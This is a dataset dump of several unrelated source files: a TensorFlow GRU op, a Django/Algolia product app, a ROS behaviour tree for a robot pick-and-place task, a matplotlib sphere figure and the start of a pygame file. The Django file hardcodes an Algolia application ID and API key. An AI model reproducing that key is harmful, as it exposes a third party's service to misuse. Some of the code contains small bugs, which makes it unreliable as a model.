x.get_shape().as_list()\n hidden_layer_shape = previous_hidden_state.get_shape().as_list()\n\n Wz = tf.get_variable('Wz',shape=[input_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n bz = tf.get_variable('bz',shape=[hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n Wr = tf.get_variable('Wr',shape=[input_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n br = tf.get_variable('br',shape=[hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n Wx = tf.get_variable('Wx',shape=[input_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n Wh = tf.get_variable('Wh',shape=[hidden_layer_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n Wo = tf.get_variable('Wo',shape=[hidden_layer_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n bo = tf.get_variable('bo',shape=[hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n\n z = tf.sigmoid(tf.matmul(x, Wz) + bz)\n r = tf.sigmoid(tf.matmul(x, Wr) + br)\n\n h_ = tf.tanh(tf.matmul(x, Wx) +\n tf.matmul(previous_hidden_state, Wh) * r)\n\n current_hidden_state = tf.multiply(\n (1 - z), h_) + tf.multiply(previous_hidden_state, z)\n\n output = tf.nn.relu(tf.matmul(current_hidden_state, Wo) + bo)\n\n return current_hidden_state , output\n","sub_path":"src/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389369632","text":"from django.shortcuts import render\nimport sqlalchemy, sqlalchemy.orm\nfrom .models import Base, Products, session\nfrom django.http import HttpResponseRedirect\nimport factory\nfrom sqlalchemy import orm\n\nfrom algoliasearch.search_client import SearchClient\nfrom algolia import settings\n\n\n# sqlalchemy session\n# engine = sqlalchemy.create_engine('sqlite:///loose.sqlite')\n# Session = sqlalchemy.orm.sessionmaker(bind=engine)\n# session = Session()\n# Base.metadata.create_all(engine)\n\n# For algolia data upload\nclient = SearchClient.create('5MOBI7FV78', '7a2c03f64a54f740cea34a137587a887')\nindex = client.init_index('products')\n\n# Home page\ndef productList(request):\n rows = session.query(Products).count()\n products = session.query(Products).all()\n context = {\n 'products':products,\n 'rows':rows\n }\n return render(request, 'product-list.html', context)\n\n# add the product and redirect to product list page\ndef productAdd(request):\n if request.method == 'POST':\n if request.POST:\n name = request.POST.get('name')\n model_number = request.POST.get('model-number')\n character = request.POST.get('character')\n brand = request.POST.get('brand')\n description = request.POST.get('description')\n product = Products(request.POST.get('name'), request.POST.get('model_number'), request.POST.get('character'), request.POST.get('brand'), request.POST.get('description'))\n session.add(product)\n session.commit()\n\n # save to algolia\n product = {'name': name, 'model_number': model_number, 'character': character, 'brand': brand, 'description': description}\n index.save_object(product, {'autoGenerateObjectIDIfNotExist': bool})\n return HttpResponseRedirect('/')\n else:\n print('well shit')\n\n context = {\n\n }\n return render(request, 'product-add.html', context)\n\ndef productDetail(request, id):\n product = index.get_object(id)\n context = {\n 'product':product\n }\n return render(request, 'product-detail.html', context)\n\ndef productSearch(request):\n context = {\n 'appID': settings.ALGOLIA['APPLICATION_ID'],\n 'searchKey': settings.ALGOLIA['API_KEY'],\n 'indexName': 'products'\n }\n return render(request, 'search.html', context)\n\n# # function to upload data to algolia\n# def fetch_data_from_database(request):\n# products = session.query(Products).all()\n# index.save_objects(products, {'autoGenerateObjectIDIfNotExist': True})\n# return render(request, 'demo.html', {'products':products })\n\n\n\n\n# convert sqlalchemy object to list of dicts\n# productList = []\n # for product in products:\n # print(product.name)\n # _product = {}\n # _product['name'] = str(product.name)\n # _product['model_number'] = str(product.model_number)\n # _product['character'] = str(product.character)\n # _product['brand'] = str(product.brand)\n # _product['description'] = str(product.description)\n # productList.append(_product)\n\n# index.save_objects(productList, {'autoGenerateObjectIDIfNotExist': True})\n\n# Function to fill data\n# def is_empty():\n# return len(session.query(Products).all()) <= 0\n#\n# def populate():\n# new_products = [Products('something', '12345', 'batman', 'apple', 'The best product'),\n# Products('something else', '45678', 'spider-Waman', 'Next', '9 year old army')]\n# session.add_all(new_products)\n# session.commit()\n\n\n# Function to add data\n# def runseeder(request):\n# for entry in range(1000):\n# fake_name = fakegen.name()\n# fake_model = fakegen.isbn10(separator=\"-\")\n# fake_character = fakegen.first_name()\n# fake_company = fakegen.company()\n# fake_description = fakegen.sentence(nb_words=15, variable_nb_words=True, ext_word_list=None)\n\n# product = Products(name=fake_name,\n# model_number=fake_model,\n# character=fake_character,\n# brand=fake_company,\n# description=fake_description,\n# )\n# session.add(product)\n# session.commit()\n\n# return render(request, 'demo.html')\n","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"260241032","text":"#!/usr/bin/env python\nimport py_trees as pt, py_trees_ros as ptr, rospy\nfrom behaviours_student import *\nfrom reactive_sequence import RSequence\n\nimport math\nimport actionlib\nfrom geometry_msgs.msg import PoseStamped, Pose, PoseWithCovarianceStamped \nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal, MoveBaseActionGoal\nfrom std_srvs.srv import Empty, SetBool, SetBoolRequest \nfrom gazebo_msgs.msg import ModelState\nfrom gazebo_msgs.srv import SetModelState\nfrom std_msgs.msg import Bool\n\n\nclass BehaviourTree(ptr.trees.BehaviourTree):\n\tdef __init__(self):\n\t\tself.picked_up_cube_topic_name = rospy.get_name() + \"/picked_up_cube_topic\"\n\t\tself.place_pose_topic = rospy.get_param(rospy.get_name() + '/place_pose_topic')\n\t\tself.pickup_pose_topic = rospy.get_param(rospy.get_name() + '/pick_pose_topic')\n\n\t\trospy.loginfo(\"Initialising behaviour tree\")\n\n\t\tb0 = TuckArm()\n\t\tb1 = activate_localizator() # activate global localizator\n\t\tb2 = pt.composites.Selector(\n\t\t\tname=\"Rotate for localization\",\n\t\t\tchildren=[counter(70, \"Rotated?\"), go(\"Rotate!\", 0, 1)]) # rotate for betteer localization\n\t\tb22 = respawn_cube()\n\t\tb3 = Navigate(self.pickup_pose_topic)\n\t\t# pickup\n\t\tb4 = LowerHead(\"Lower head!\", \"down\")\n\t\tb5 = PickCube(self.picked_up_cube_topic_name)\n\t\tb6 = LowerHead(\"Rise head!\", \"up\")\n\n\t\tb7 = Navigate(self.place_pose_topic)\n\t\t# place\n\t\tb8 = LowerHead(\"Lower head!\", \"down\")\n\t\tb9 = PlaceCube()\n\t\tb10 = LowerHead(\"Rise head!\", \"up\")\n\t\t# become the tree\n\t\ttree = RSequence(name=\"Main sequence\", children=[b0, b1, b2, b22, b3, b4, b5, b6, b7, b8, b9, b10])\n\t\tsuper(BehaviourTree, self).__init__(tree)\n\n\t\t# execute the behaviour tree\n\t\trospy.sleep(5)\n\t\tself.setup(timeout=10000)\n\t\twhile not rospy.is_shutdown(): self.tick_tock(1)\t\n\n\n### BEHAVIOURS\n\n#### SERVICE global_localization\nclass activate_localizator(pt.behaviour.Behaviour):\n\n\tdef __init__(self):\n\n\t\t# server\n\t\trospy.wait_for_service('/global_localization', timeout=30)\n\t\tself.localize_srv = rospy.ServiceProxy('/global_localization', Empty)\n\n\t\t# execution checker\n\t\tself.activated = False\n\n\t\t# become a behaviour\n\t\tsuper(activate_localizator, self).__init__(\"Activate localizator!\")\n\n\tdef update(self):\n\n\t\t# try to tuck head if haven't already\n\t\tif not self.activated:\n\n\t\t\t# command\n\t\t\tx = self.localize_srv()\n\t\t\tprint(x)\n\t\t\tself.activated = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.SUCCESS\n\n\t\t# react to outcome\n\t\telse: return pt.common.Status.SUCCESS\n\n\n#### ACTION SERVICE move_base\nclass Navigate(pt.behaviour.Behaviour):\n\n\tdef __init__(self,pose_topic):\n\t\t\n\t\tself.pose_topic = pose_topic\n\t\tself.pose = None\n\t\t# Set up action client\n\t\tself.move_base_action = SimpleActionClient(\"/move_base\", MoveBaseAction)\n\n\t\t# personal goal setting\n\t\tself.goal = MoveBaseGoal()\n\n\t\t# execution checker\n\t\tself.have_pose = False\n\t\tself.sent_goal = False\n\t\tself.finished = False\n\n\t\t# become a behaviour\n\t\tsuper(Navigate, self).__init__(\"Navigate!\")\n\n\tdef feedback_cb(self,feedback):\n\t\tposition = feedback.base_position.pose.position\n\t\torientation = feedback.base_position.pose.orientation\n\t\tdelta_pos=math.hypot(self.pose.pose.position.x - position.x, self.pose.pose.position.y - position.y)\n\t\tdelta_rot = math.hypot(self.pose.pose.orientation.z - orientation.z, self.pose.pose.orientation.w - orientation.w)\n\t\tif delta_pos < 0.09 and delta_rot < 0.05:\n\t\t\tself.finished = True\n\t\t\tself.move_base_action.cancel_all_goals()\n\t\telse:\n\t\t\tself.finished = False\n\t\t\t# rospy.loginfo(\"Position: %s. Orientation: %s\", delta_pos, delta_rot )\n\n\tdef done_cb(self, state, feedback):\n\t\t\tself.finished = True\n\n\n\tdef update(self):\n\n\t\t# already tucked the arm\n\t\tif self.finished: \n\t\t\treturn pt.common.Status.SUCCESS\n\t\t\n\t\t# command to get the pose where to navigate to\n\t\telif not self.have_pose:\n\t\t\t# Set up subscriber to get the pickup or place pose\n\t\t\tself.pose = rospy.wait_for_message(self.pose_topic, PoseStamped)\n\t\t\tself.have_pose = True\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\telif not self.sent_goal:\n\t\t\t\n\t\t\t# send the goal\n\t\t\tself.goal = MoveBaseGoal(self.pose)\n\t\t\t# self.goal.target_pose = PoseStamped( self.pose)\n\t\t\t# self.goal.goal.target_pose = self.pose\n\t\t\tself.move_base_action.send_goal(self.goal, feedback_cb=self.feedback_cb , done_cb=self.done_cb)\n\t\t\tself.sent_goal = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# if I'm still trying :|\n\t\telse:\n\t\t\treturn pt.common.Status.RUNNING\n\t\t\t\n### SIMPLE Services\nclass TuckArm(pt.behaviour.Behaviour): # put arm in home position\n\n\tdef __init__(self):\n\n\t\t# Set up action client\n\t\tself.play_motion_ac = SimpleActionClient(\"/play_motion\", PlayMotionAction)\n\n\t\t# personal goal setting\n\t\tself.goal = PlayMotionGoal()\n\t\tself.goal.motion_name = 'home'\n\t\tself.goal.skip_planning = True\n\n\t\t# execution checker\n\t\tself.sent_goal = False\n\t\tself.finished = False\n\n\t\t# become a behaviour\n\t\tsuper(TuckArm, self).__init__(\"Tuck arm!\")\n\n\tdef update(self):\n\n\t\t# already tucked the arm\n\t\tif self.finished: \n\t\t\treturn pt.common.Status.SUCCESS\n\t\t\n\t\t# command to tuck arm if haven't already\n\t\telif not self.sent_goal:\n\n\t\t\t# send the goal\n\t\t\tself.play_motion_ac.send_goal(self.goal)\n\t\t\tself.sent_goal = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# if I was succesful! :)))))))))\n\t\telif self.play_motion_ac.get_result():\n\n\t\t\t# than I'm finished!\n\t\t\tself.finished = True\n\t\t\treturn pt.common.Status.SUCCESS\n\n\t\t# if I'm still trying :|\n\t\telse:\n\t\t\treturn pt.common.Status.RUNNING\n\n\nclass Running(pt.behaviour.Behaviour):\n\tdef __init__(self):\n\t\tsuper(Running, self).__init__(name=\"running\")\n\t\n\tdef update(self):\n\t\treturn pt.common.Status.RUNNING\n\n\nclass PickCube(pt.behaviour.Behaviour):\n\tdef __init__(self, picked_up_cube_topic_name):\n\t\tself.pickService = rospy.get_param(rospy.get_name() + '/pick_srv')\n\n\t\tself.pickProxy = rospy.ServiceProxy(self.pickService, SetBool)\n\t\tself.pub = rospy.Publisher(picked_up_cube_topic_name, Bool, queue_size=10)\n\t\t# execution checker\n\t\tself.called_service = False\n\t\tself.finished = False\n\t\t\n\t\tsuper(PickCube, self).__init__(\"Pick Up Cube\")\n\tdef update(self):\n\t\t# try to tuck head if haven't already\n\t\tif not self.called_service:\n\n\t\t\t# command\n\t\t\tself.result = self.pickProxy(True)\n\t\t\trospy.loginfo(\"result of the pick operation \"+str(self.result.success))\n\t\t\tself.called_service = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# react to outcome\n\t\telse: \n\t\t\t#self.called_service = False\n\t\t\t#sb = SetBool()\n\t\t\tif self.result.success:\t\t\t\t\n\t\t\t\t#sb.success = True\n\t\t\t\tself.pub.publish(Truee)\n\t\t\t\treturn pt.common.Status.SUCCESS \n\t\t\telse:\n\t\t\t\t#sb.success = False\n\t\t\t\tself.pub.publish(False)\n\t\t\t\treturn pt.common.Status.FAILURE\n\n\nclass respawn_cube(pt.behaviour.Behaviour):\n\n\tdef __init__(self):\n\n\t\t# server\n\t\trospy.wait_for_service('/gazebo/set_model_state', timeout=30)\n\t\tself.respawn_cube_srv = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)\n\n\t\t# execution checker\n\t\tself.activated = False\n\n\t\t# become a behaviour\n\t\tsuper(respawn_cube, self).__init__(\"Respawn cube!\")\n\n\tdef update(self):\n\n\t\t# try to tuck head if haven't already\n\t\tif not self.activated:\n\t\t\trespawn_cube_srv_name = '/gazebo/set_model_state'\n\t\t\t\n\t\t\trospy.wait_for_service(respawn_cube_srv_name, timeout=30)\n\t\t\tdata = { 'model_name': 'aruco_cube', 'pose': { 'position': { 'x': -1.130530, 'y': -6.653650, 'z': 0.86250 }, 'orientation': {'x': 0, 'y': 0, 'z': 0, 'w': 1 } }, 'twist': { 'linear': {'x': 0 , 'y': 0, 'z': 0 } , 'angular': { 'x': 0, 'y': 0, 'z': 0 } } , 'reference_frame': 'map' }\n\t\t\tmsg = ModelState()\n\t\t\tmsg.model_name = data['model_name']\n\t\t\tpose = Pose()\n\t\t\tpose.position.x = data['pose']['position']['x']\n\t\t\tpose.position.y = data['pose']['position']['y']\n\t\t\tpose.position.z = data['pose']['position']['z']\n\t\t\tmsg.pose = pose\n\t\t\tself.respawn_cube_srv(msg)\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.SUCCESS\n\n\t\t# react to outcome\n\t\telse: return pt.common.Status.SUCCESS\n\t\t\n\n\nclass PlaceCube(pt.behaviour.Behaviour):\n\tdef __init__(self):\n\t\tself.pickService = rospy.get_param(rospy.get_name() + '/place_srv')\n\n\t\tself.placeProxy = rospy.ServiceProxy(self.pickService, SetBool)\n\n\t\t# execution checker\n\t\tself.called_service = False\n\t\tself.finished = False\n\t\t\n\t\tsuper(PlaceCube, self).__init__(\"Place Cube\")\n\tdef update(self):\n\t\t# try to tuck head if haven't already\n\t\tif not self.called_service:\n\n\t\t\t# command\n\t\t\tself.result = self.placeProxy(True)\n\t\t\trospy.loginfo(\"result of the place operation \"+ str(self.result.success))\n\t\t\tself.called_service = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# react to outcome\n\t\telse: return pt.common.Status.SUCCESS if self.result.success else pt.common.Status.FAILURE\n\n\nclass LowerHead(pt.behaviour.Behaviour):\n\n\tdef __init__(self, name, type):\n\n\t\t# server\n\t\tmv_head_srv_nm = rospy.get_param(rospy.get_name() + '/move_head_srv')\n\t\tself.move_head_srv = rospy.ServiceProxy(mv_head_srv_nm, MoveHead)\n\t\trospy.wait_for_service(mv_head_srv_nm, timeout=30)\n\t\tself.type = type\n\t\t# execution checker\n\t\tself.tried = False\n\t\tself.tucked = False\n\n\t\t# become a behaviour\n\t\tsuper(LowerHead, self).__init__(name)\n\n\tdef update(self):\n\n\t\t# try to tuck head if haven't already\n\t\tif not self.tried:\n\n\t\t\t# command\n\t\t\tself.move_head_req = self.move_head_srv(self.type)\n\t\t\tself.tried = True\n\n\t\t\t# tell the tree you're running\n\t\t\treturn pt.common.Status.RUNNING\n\n\t\t# react to outcome\n\t\telse: return pt.common.Status.SUCCESS if self.move_head_req.success else pt.common.Status.FAILURE\n\n\n\t### CONDITIONs\n\n###reached pick position\nclass Pick_Pos_Condition(pt.behaviour.Behaviour):\n\tdef callback(self, pose):\n\t\tself.position = pose.pose\n\t\t\n\n\n\tdef __init__(self, pick_pose_topic):\n\t\tself.pick_pose_topic = pick_pose_topic\n\t\tself.amcl = '/amcl_pose'\n\t\trospy.Subscriber(self.amcl, PoseWithCovarianceStamped, self.callback)\n\t\tself.postition = PoseStamped()\n\n\tdef update(self):\n\t\tself.pose = rospy.wait_for_message(self.pick_pose_topic, PoseStamped)\n\t\tposition = self.position.pose.position\n\t\torientation = self.position.pose.orientation\n\t\tdelta_pos=math.hypot(self.pose.pose.position.x - position.x, self.pose.pose.position.y - position.y)\n\t\tdelta_rot = math.hypot(self.pose.pose.orientation.z - orientation.z, self.pose.pose.orientation.w - orientation.w)\n\t\tif delta_pos < 0.09 and delta_rot < 0.05:\n\t\t\treturn pt.common.Status.SUCCESS \n\t\telse:\n\t\t\treturn pt.common.Status.FAILURE\n\n###reached pick position\nclass Place_Pos_Condition(pt.behaviour.Behaviour):\n\tdef callback(self, pose):\n\t\tself.position = pose.pose\n\t\t\n\n\n\tdef __init__(self, place_pos_topic):\n\t\tself.place_pos_topic = place_pos_topic\n\t\tself.amcl = '/amcl_pose'\n\t\trospy.Subscriber(self.amcl, PoseWithCovarianceStamped, self.callback)\n\t\tself.postition = PoseStamped()\n\n\tdef update(self):\n\t\tself.pose = rospy.wait_for_message(self.place_pos_topic, PoseStamped)\n\t\tposition = self.position.pose.position\n\t\torientation = self.position.pose.orientation\n\t\tdelta_pos=math.hypot(self.pose.pose.position.x - position.x, self.pose.pose.position.y - position.y)\n\t\tdelta_rot = math.hypot(self.pose.pose.orientation.z - orientation.z, self.pose.pose.orientation.w - orientation.w)\n\t\tif delta_pos < 0.09 and delta_rot < 0.05:\n\t\t\treturn pt.common.Status.SUCCESS \n\t\telse:\n\t\t\treturn pt.common.Status.FAILURE\n\n###cube picked\nclass cube_picked(pt.behaviour.Behaviour):\n\tdef callback(self, setBool):\n\t\tself.cube_picked = setBool\n\t\n\tdef __init__(self, cube_picked_topic_name):\n\t\tself.cube_picked = False\n\t\t#does this one have to be called, the main already does that\n\t\trospy.init_node('node_name')\n\n\t\trospy.Subscriber(cube_picked_topic_name, Bool, self.callback)\n\t\n\tdef update(self):\n\t\tif self.cube_picked:\n\t\t\treturn pt.common.Status.SUCCESS\n\t\telse:\n\t\t\treturn pt.common.Status.FAILURE\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n\n\trospy.init_node('main_state_machine')\n\ttry:\n\t\tBehaviourTree()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n\n\trospy.spin()","sub_path":"scripts/behaviour_trees/bt_students.py","file_name":"bt_students.py","file_ext":"py","file_size_in_byte":11851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"620439885","text":"import texfig\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm, colors\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\nimport numpy as np\nimport pylab\n\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\ndef annotate3d(ax, s, *args, **kwargs):\n '''add anotation text s to to Axes3d ax'''\n\n tag = Annotation3D(s, *args, **kwargs)\n ax.add_artist(tag)\n\n\nscalefactor = 1 #1 para qualidade normal, 5 para compilação rápida\nazim_init = -50 # ângulo azimutal inicial\nelev_init = 20 # angulo elev inicial\nfontsize = '14'\n\n# Create a sphere\nr = 2\npi = np.pi\ncos = np.cos\nsin = np.sin\nepsilon = 0.04*pi\n\n#Esfera\nphi, theta = np.mgrid[0.0:pi:(scalefactor**(-1))*50j, 0.0:2.0*pi:(scalefactor**(-1))*50j]\nx = r*sin(phi)*cos(theta)\ny = r*sin(phi)*sin(theta)\nz = r*cos(phi)\n\n#Pontos\nphi_0 = 0.4*pi\ntheta_0 = 0.4*pi\nP_0 = (r*sin(phi_0)*cos(theta_0), r*sin(phi_0)*sin(theta_0), r*cos(phi_0))\nphii = [0, phi_0, pi]\nO_0 = (r*sin(phi_0-epsilon)*cos(theta_0-epsilon), r*sin(phi_0-epsilon)*sin(theta_0-epsilon), r*cos(phi_0-epsilon))\nQ_0 = (r*sin(phi_0+epsilon)*cos(theta_0-epsilon), r*sin(phi_0+epsilon)*sin(theta_0-epsilon), r*cos(phi_0+epsilon))\nR_0 = (r*sin(phi_0+epsilon)*cos(theta_0+epsilon), r*sin(phi_0+epsilon)*sin(theta_0+epsilon), r*cos(phi_0+epsilon))\nS_0 = (r*sin(phi_0-epsilon)*cos(theta_0+epsilon), r*sin(phi_0-epsilon)*sin(theta_0+epsilon), r*cos(phi_0-epsilon))\n\nxx_0 = [O_0[0], Q_0[0], R_0[0], S_0[0]]\nyy_0 = [O_0[1], Q_0[1], R_0[1], S_0[1]]\nzz_0 = [O_0[2], Q_0[2], R_0[2], S_0[2]]\n\n\n\nxx = r*sin(phii)*cos(theta_0)\nyy = r*sin(phii)*sin(theta_0)\nzz = r*cos(phii)\n\n#Curvas\nphi_1 = np.linspace(0, pi, int(50/scalefactor))\ntheta_1 = [theta_0+epsilon, theta_0-epsilon]\nphi_2 = [phi_0 + epsilon, phi_0 - epsilon]\ntheta_2 = np.linspace(-pi/2 - azim_init/180*pi, pi/2 - azim_init/180*pi, int(50/scalefactor))\ntheta_22 = np.linspace(-pi, pi, int(50/scalefactor))\n\n\nx_11 = r*sin(phi_1)*cos(theta_1[0])\ny_11 = r*sin(phi_1)*sin(theta_1[0])\nz_11 = r*cos(phi_1)\nx_21 = r*sin(phi_2[0])*cos(theta_2)\ny_21 = r*sin(phi_2[0])*sin(theta_2)\nz_21 = r*cos(phi_2[0])\nx_12 = r*sin(phi_1)*cos(theta_1[1])\ny_12 = r*sin(phi_1)*sin(theta_1[1])\nz_12 = r*cos(phi_1)\nx_22 = r*sin(phi_2[1])*cos(theta_2)\ny_22 = r*sin(phi_2[1])*sin(theta_2)\nz_22 = r*cos(phi_2[1])\nxx_21 = r*sin(phi_2[0])*cos(theta_22)\nyy_21 = r*sin(phi_2[0])*sin(theta_22)\nzz_21 = r*cos(phi_2[0])\nxx_22 = r*sin(phi_2[1])*cos(theta_22)\nyy_22 = r*sin(phi_2[1])*sin(theta_22)\nzz_22 = r*cos(phi_2[1])\n\n\n\n#Ajustes da Imagem\nfig = texfig.figure()\nax = fig.add_subplot(111, projection='3d')\nax.view_init(azim=-azim_init, elev=elev_init) # vista da imagem\nfig.set_size_inches(4, 4, 4)\ncut = 0.65\nax.set_xlim([-r*cut,r*cut])\nax.set_ylim([-r*cut,r*cut])\nax.set_zlim([-r*cut,r*cut])\n\n#Renderizar\nax.plot_surface(\n x, y, z, rstride=1, cstride=1, color='c', alpha=0.15, linewidth=0, zorder=0) #esfera\n\nax.scatter(xx, yy, zz, color=\"darkblue\", s=20, zorder=1) # pontos P + polos\nax.scatter(xx_0, yy_0, zz_0, color=\"darkblue\", s=20, zorder=1) # pontos O-Q-R-S\n\nplt.plot(x_11, y_11, z_11, color=\"darkblue\", alpha=0.8, zorder=0)\nplt.plot(x_21, y_21, z_21, color=\"darkblue\", alpha=0.8, zorder=0)\nplt.plot(x_12, y_12, z_12, color=\"darkblue\", alpha=0.8, zorder=0)\nplt.plot(x_22, y_22, z_22, color=\"darkblue\", alpha=0.8, zorder=0)\nplt.plot(xx_21, yy_21, zz_21, color=\"darkblue\", alpha=0.2, zorder=0, ls='--')\nplt.plot(xx_22, yy_22, zz_22, color=\"darkblue\", alpha=0.2, zorder=0, ls='--')\n\n# #Setas\nstep_arrow=0.007\n # O Q\nx_seta, y_seta, z_seta = [0.5*(Q_0[0]+O_0[0]), 0.5*(Q_0[1]+O_0[1]), 0.5*(Q_0[2]+O_0[2])]\nx2, y2, _ = proj3d.proj_transform(x_seta, y_seta, z_seta, ax.get_proj())\nplt.arrow(x2, y2, 0.05*step_arrow, -0.5*step_arrow,\nshape='full', length_includes_head=True, head_width=.0035, color='darkblue', zorder=0, alpha=0.8\n)\n # Q R\nx_seta, y_seta, z_seta = [0.5*(Q_0[0]+R_0[0]), 0.5*(Q_0[1]+R_0[1]), 0.5*(Q_0[2]+R_0[2])]\nx2, y2, _ = proj3d.proj_transform(x_seta, y_seta, z_seta, ax.get_proj())\nplt.arrow(x2, y2, +0.45*step_arrow, +0.02*step_arrow,\nshape='full', length_includes_head=True, head_width=.0035, color='darkblue', zorder=0, alpha=0.8\n)\n # R S\nx_seta, y_seta, z_seta = [0.5*(S_0[0]+R_0[0]), 0.5*(S_0[1]+R_0[1]), 0.5*(S_0[2]+R_0[2])]\nx2, y2, _ = proj3d.proj_transform(x_seta, y_seta, z_seta, ax.get_proj())\nplt.arrow(x2, y2, -0.05*step_arrow, +0.5*step_arrow,\nshape='full', length_includes_head=True, head_width=.0035, color='darkblue', zorder=0, alpha=0.8\n)\n # S O\nx_seta, y_seta, z_seta = [0.5*(S_0[0]+O_0[0]), 0.5*(S_0[1]+O_0[1]), 0.5*(S_0[2]+O_0[2])]\nx2, y2, _ = proj3d.proj_transform(x_seta, y_seta, z_seta, ax.get_proj())\nplt.arrow(x2, y2, -0.45*step_arrow, -0.02*step_arrow,\nshape='full', length_includes_head=True, head_width=.0035, color='darkblue', zorder=0, alpha=0.8\n)\n\n\n# #Legendas\n\nax.text(P_0[0]+0.1, P_0[1]-0.1, P_0[2]+0.02, r\"$P$\", color='darkblue', size=fontsize) # P\nax.text(S_0[0]+0.1, S_0[1]+0.2, S_0[2]+0.15, r\"$S$\", color='darkblue', size=fontsize) # S\nax.text(O_0[0]+0.2, O_0[1]-0.15, O_0[2]+0.05, r\"$O$\", color='darkblue', size=fontsize) # O\nax.text(Q_0[0]+0.2, Q_0[1]-0.2, Q_0[2]-0.32, r\"$Q$\", color='darkblue', size=fontsize) # Q\nax.text(R_0[0]+0.12, R_0[1]+0.2, R_0[2]-0.2, r\"$R$\", color='darkblue', size=fontsize) # R\n\n\n# phi-menos\nphi_leg = 0.2*pi\ntheta_leg = theta_0 - epsilon\nx_leg = r*sin(phi_leg)*cos(theta_leg)\ny_leg = r*sin(phi_leg)*sin(theta_leg)\nz_leg = r*cos(phi_leg)\nx2, y2, _ = proj3d.proj_transform(x_leg, y_leg, z_leg, ax.get_proj())\nlabel = pylab.annotate(\n r\"$ \\phi=\\phi_0-\\varepsilon$\", color='darkblue',\n xy=(x2, y2), xytext=(-15,10), size=fontsize,\n textcoords='offset points', ha='right', va='bottom',\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0', color='darkblue')\n)\n# phi-mais\nphi_leg = 0.7*pi\ntheta_leg = theta_0 + epsilon\nx_leg = r*sin(phi_leg)*cos(theta_leg)\ny_leg = r*sin(phi_leg)*sin(theta_leg)\nz_leg = r*cos(phi_leg)\nx2, y2, _ = proj3d.proj_transform(x_leg, y_leg, z_leg, ax.get_proj())\nlabel = pylab.annotate(\n r\"$ \\phi=\\phi_0+\\varepsilon$\", color='darkblue',\n xy=(x2, y2), xytext=(+75,-30), size=fontsize,\n textcoords='offset points', ha='right', va='bottom',\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0', color='darkblue')\n)\n# theta-mais\nphi_leg = phi_0 + epsilon\ntheta_leg = 0.1*pi\nx_leg = r*sin(phi_leg)*cos(theta_leg)\ny_leg = r*sin(phi_leg)*sin(theta_leg)\nz_leg = r*cos(phi_leg)\nx2, y2, _ = proj3d.proj_transform(x_leg, y_leg, z_leg, ax.get_proj())\nlabel = pylab.annotate(\n r\"$ \\theta=\\theta_0+\\varepsilon$\", color='darkblue',\n xy=(x2, y2), xytext=(-5,-45), size=fontsize,\n textcoords='offset points', ha='right', va='bottom',\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0', color='darkblue')\n)\n\n# theta-menos\nphi_leg = phi_0 - epsilon\ntheta_leg = 0.1*pi\nx_leg = r*sin(phi_leg)*cos(theta_leg)\ny_leg = r*sin(phi_leg)*sin(theta_leg)\nz_leg = r*cos(phi_leg) \nx2, y2, _ = proj3d.proj_transform(x_leg, y_leg, z_leg, ax.get_proj())\nlabel = pylab.annotate(\n r\"$ \\theta=\\theta_0-\\varepsilon$\", color='darkblue',\n xy=(x2, y2), xytext=(-5,+35), size=fontsize,\n textcoords='offset points', ha='right', va='bottom',\n arrowprops = dict(arrowstyle = '->', connectionstyle = 'arc3,rad=0', color='darkblue')\n)\n\n\n\n\n# Plotar\nplt.tight_layout()\nfig.set_size_inches(4, 4, 4)\nplt.axis('off')\ntexfig.savefig('EsferaLoop', transparent=True)","sub_path":"figuras/esfera_loop_pgf.py","file_name":"esfera_loop_pgf.py","file_ext":"py","file_size_in_byte":7832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"231685718","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport random\nimport time\nimport re\nfrom glob import glob\nfrom pygame import 